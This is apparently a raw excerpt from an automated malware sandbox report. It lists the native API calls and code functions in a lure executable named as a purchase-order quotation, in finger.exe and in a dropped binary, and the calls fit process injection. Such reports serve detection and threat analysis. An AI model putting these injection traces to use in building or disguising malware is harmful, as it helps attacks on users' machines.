                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2B80 NtQueryInformationFile,2_2_017B2B80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2AF0 NtWriteFile,2_2_017B2AF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2AD0 NtReadFile,2_2_017B2AD0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2AB0 NtWaitForSingleObject,2_2_017B2AB0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2D30 NtUnmapViewOfSection,2_2_017B2D30
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2D10 NtMapViewOfSection,2_2_017B2D10
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2D00 NtSetInformationFile,2_2_017B2D00
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2DD0 NtDelayExecution,2_2_017B2DD0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2DB0 NtEnumerateKey,2_2_017B2DB0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2C60 NtCreateKey,2_2_017B2C60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2C00 NtQueryInformationProcess,2_2_017B2C00
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2CF0 NtOpenProcess,2_2_017B2CF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2CC0 NtQueryVirtualMemory,2_2_017B2CC0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2CA0 NtQueryInformationToken,2_2_017B2CA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2F60 NtCreateProcessEx,2_2_017B2F60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2F30 NtCreateSection,2_2_017B2F30
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2FE0 NtCreateFile,2_2_017B2FE0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2FB0 NtResumeThread,2_2_017B2FB0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2FA0 NtQuerySection,2_2_017B2FA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2F90 NtProtectVirtualMemory,2_2_017B2F90
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2E30 NtWriteVirtualMemory,2_2_017B2E30
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2EE0 NtQueueApcThread,2_2_017B2EE0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2EA0 NtAdjustPrivilegesToken,2_2_017B2EA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2E80 NtReadVirtualMemory,2_2_017B2E80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B3010 NtOpenDirectoryObject,2_2_017B3010
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B3090 NtSetValueKey,2_2_017B3090
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B39B0 NtGetContextThread,2_2_017B39B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B3D70 NtOpenThread,2_2_017B3D70
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B3D10 NtOpenProcessToken,2_2_017B3D10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC4340 NtSetContextThread,LdrInitializeThunk,5_2_02EC4340
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC4650 NtSuspendThread,LdrInitializeThunk,5_2_02EC4650
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2AF0 NtWriteFile,LdrInitializeThunk,5_2_02EC2AF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2AD0 NtReadFile,LdrInitializeThunk,5_2_02EC2AD0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02EC2BE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02EC2BF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02EC2BA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2B60 NtClose,LdrInitializeThunk,5_2_02EC2B60
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02EC2EE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02EC2E80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2FE0 NtCreateFile,LdrInitializeThunk,5_2_02EC2FE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2FB0 NtResumeThread,LdrInitializeThunk,5_2_02EC2FB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2F30 NtCreateSection,LdrInitializeThunk,5_2_02EC2F30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02EC2CA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2C60 NtCreateKey,LdrInitializeThunk,5_2_02EC2C60
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02EC2C70
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02EC2DF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02EC2DD0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02EC2D30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02EC2D10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC35C0 NtCreateMutant,LdrInitializeThunk,5_2_02EC35C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC39B0 NtGetContextThread,LdrInitializeThunk,5_2_02EC39B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2AB0 NtWaitForSingleObject,5_2_02EC2AB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2B80 NtQueryInformationFile,5_2_02EC2B80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2EA0 NtAdjustPrivilegesToken,5_2_02EC2EA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2E30 NtWriteVirtualMemory,5_2_02EC2E30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2FA0 NtQuerySection,5_2_02EC2FA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2F90 NtProtectVirtualMemory,5_2_02EC2F90
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2F60 NtCreateProcessEx,5_2_02EC2F60
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2CF0 NtOpenProcess,5_2_02EC2CF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2CC0 NtQueryVirtualMemory,5_2_02EC2CC0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2C00 NtQueryInformationProcess,5_2_02EC2C00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2DB0 NtEnumerateKey,5_2_02EC2DB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2D00 NtSetInformationFile,5_2_02EC2D00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC3090 NtSetValueKey,5_2_02EC3090
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC3010 NtOpenDirectoryObject,5_2_02EC3010
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC3D70 NtOpenThread,5_2_02EC3D70
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC3D10 NtOpenProcessToken,5_2_02EC3D10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339790 NtCreateFile,5_2_00339790
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339900 NtReadFile,5_2_00339900
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339A00 NtDeleteFile,5_2_00339A00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339AB0 NtClose,5_2_00339AB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339C10 NtAllocateVirtualMemory,5_2_00339C10
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_010EF4780_2_010EF478
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_010EB5D00_2_010EB5D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_010EBB600_2_010EBB60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_066955D80_2_066955D8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_066955C90_2_066955C9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_068BF9E80_2_068BF9E8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_068BE4000_2_068BE400
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_068A00060_2_068A0006
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_068A00400_2_068A0040
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_068BE9080_2_068BE908
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_00418C732_2_00418C73
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004014F02_2_004014F0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004030F02_2_004030F0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004012002_2_00401200
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004104132_2_00410413
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004044F72_2_004044F7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0042F4A32_2_0042F4A3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004025602_2_00402560
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0040E6432_2_0040E643
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004106332_2_00410633
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_00416E832_2_00416E83
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0040E7902_2_0040E790
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0040E7932_2_0040E793
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018341A22_2_018341A2
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018401AA2_2_018401AA
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018381CC2_2_018381CC
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017701002_2_01770100
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181A1182_2_0181A118
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018081582_2_01808158
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018120002_2_01812000
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018403E62_2_018403E6
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178E3F02_2_0178E3F0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183A3522_2_0183A352
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018002C02_2_018002C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018202742_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018405912_2_01840591
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017805352_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182E4F62_2_0182E4F6
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018244202_2_01824420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018324462_2_01832446
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017807702_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A47502_2_017A4750
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177C7C02_2_0177C7C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179C6E02_2_0179C6E0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017969622_2_01796962
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0184A9A62_2_0184A9A6
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A02_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178A8402_2_0178A840
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017828402_2_01782840
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE8F02_2_017AE8F0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017668B82_2_017668B8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01836BD72_2_01836BD7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183AB402_2_0183AB40
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA802_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178AD002_2_0178AD00
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177ADE02_2_0177ADE0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181CD1F2_2_0181CD1F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01798DBF2_2_01798DBF
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820CB52_2_01820CB5
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780C002_2_01780C00
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770CF22_2_01770CF2
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F4F402_2_017F4F40
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A0F302_2_017A0F30
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017C2F282_2_017C2F28
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178CFE02_2_0178CFE0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01822F302_2_01822F30
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01772FC82_2_01772FC8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FEFA02_2_017FEFA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183CE932_2_0183CE93
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780E592_2_01780E59
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183EEDB2_2_0183EEDB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183EE262_2_0183EE26
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01792E902_2_01792E90
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176F1722_2_0176F172
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B516C2_2_017B516C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178B1B02_2_0178B1B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0184B16B2_2_0184B16B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182F0CC2_2_0182F0CC
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183F0E02_2_0183F0E0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018370E92_2_018370E9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017870C02_2_017870C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176D34C2_2_0176D34C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183132D2_2_0183132D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017C739A2_2_017C739A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018212ED2_2_018212ED
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179B2C02_2_0179B2C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017852A02_2_017852A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181D5B02_2_0181D5B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018375712_2_01837571
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017714602_2_01771460
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183F43F2_2_0183F43F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183F7B02_2_0183F7B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018316CC2_2_018316CC
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017899502_2_01789950
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179B9502_2_0179B950
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018159102_2_01815910
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017ED8002_2_017ED800
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017838E02_2_017838E0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017BDBF92_2_017BDBF9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F5BF02_2_017F5BF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183FB762_2_0183FB76
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179FB802_2_0179FB80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F3A6C2_2_017F3A6C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01821AA32_2_01821AA3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181DAAC2_2_0181DAAC
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182DAC62_2_0182DAC6
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01837A462_2_01837A46
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183FA492_2_0183FA49
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017C5AA02_2_017C5AA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01783D402_2_01783D40
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179FDC02_2_0179FDC0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01831D5A2_2_01831D5A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01837D732_2_01837D73
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F9C322_2_017F9C32
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183FCF22_2_0183FCF2
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183FFB12_2_0183FFB1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183FF092_2_0183FF09
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01781F922_2_01781F92
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01789EB02_2_01789EB0
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F37854_2_063F3785
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063FBFE54_2_063FBFE5
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F1B054_2_063F1B05
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F1B024_2_063F1B02
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_064128154_2_06412815
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063E78694_2_063E7869
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F89154_2_063F8915
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F19B54_2_063F19B5
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F39A54_2_063F39A5
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063FA1F54_2_063FA1F5
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F102C05_2_02F102C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F302745_2_02F30274
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F503E65_2_02F503E6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E9E3F05_2_02E9E3F0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4A3525_2_02F4A352
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F220005_2_02F22000
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F481CC5_2_02F481CC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F441A25_2_02F441A2
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F501AA5_2_02F501AA
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F181585_2_02F18158
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E801005_2_02E80100
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F2A1185_2_02F2A118
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EAC6E05_2_02EAC6E0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E8C7C05_2_02E8C7C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E907705_2_02E90770
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EB47505_2_02EB4750
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F3E4F65_2_02F3E4F6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F424465_2_02F42446
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F344205_2_02F34420
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F505915_2_02F50591
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E905355_2_02E90535
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E8EA805_2_02E8EA80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F46BD75_2_02F46BD7
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4AB405_2_02F4AB40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EBE8F05_2_02EBE8F0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E768B85_2_02E768B8
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E9A8405_2_02E9A840
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E928405_2_02E92840
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E929A05_2_02E929A0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F5A9A65_2_02F5A9A6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EA69625_2_02EA6962
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4EEDB5_2_02F4EEDB
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4CE935_2_02F4CE93
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EA2E905_2_02EA2E90
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E90E595_2_02E90E59
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4EE265_2_02F4EE26
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E9CFE05_2_02E9CFE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E82FC85_2_02E82FC8
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F0EFA05_2_02F0EFA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F04F405_2_02F04F40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F32F305_2_02F32F30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02ED2F285_2_02ED2F28
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EB0F305_2_02EB0F30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E80CF25_2_02E80CF2
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F30CB55_2_02F30CB5
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E90C005_2_02E90C00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E8ADE05_2_02E8ADE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EA8DBF5_2_02EA8DBF
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E9AD005_2_02E9AD00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F2CD1F5_2_02F2CD1F
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F312ED5_2_02F312ED
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EAB2C05_2_02EAB2C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E952A05_2_02E952A0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02ED739A5_2_02ED739A
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E7D34C5_2_02E7D34C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4132D5_2_02F4132D
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4F0E05_2_02F4F0E0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F470E95_2_02F470E9
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E970C05_2_02E970C0
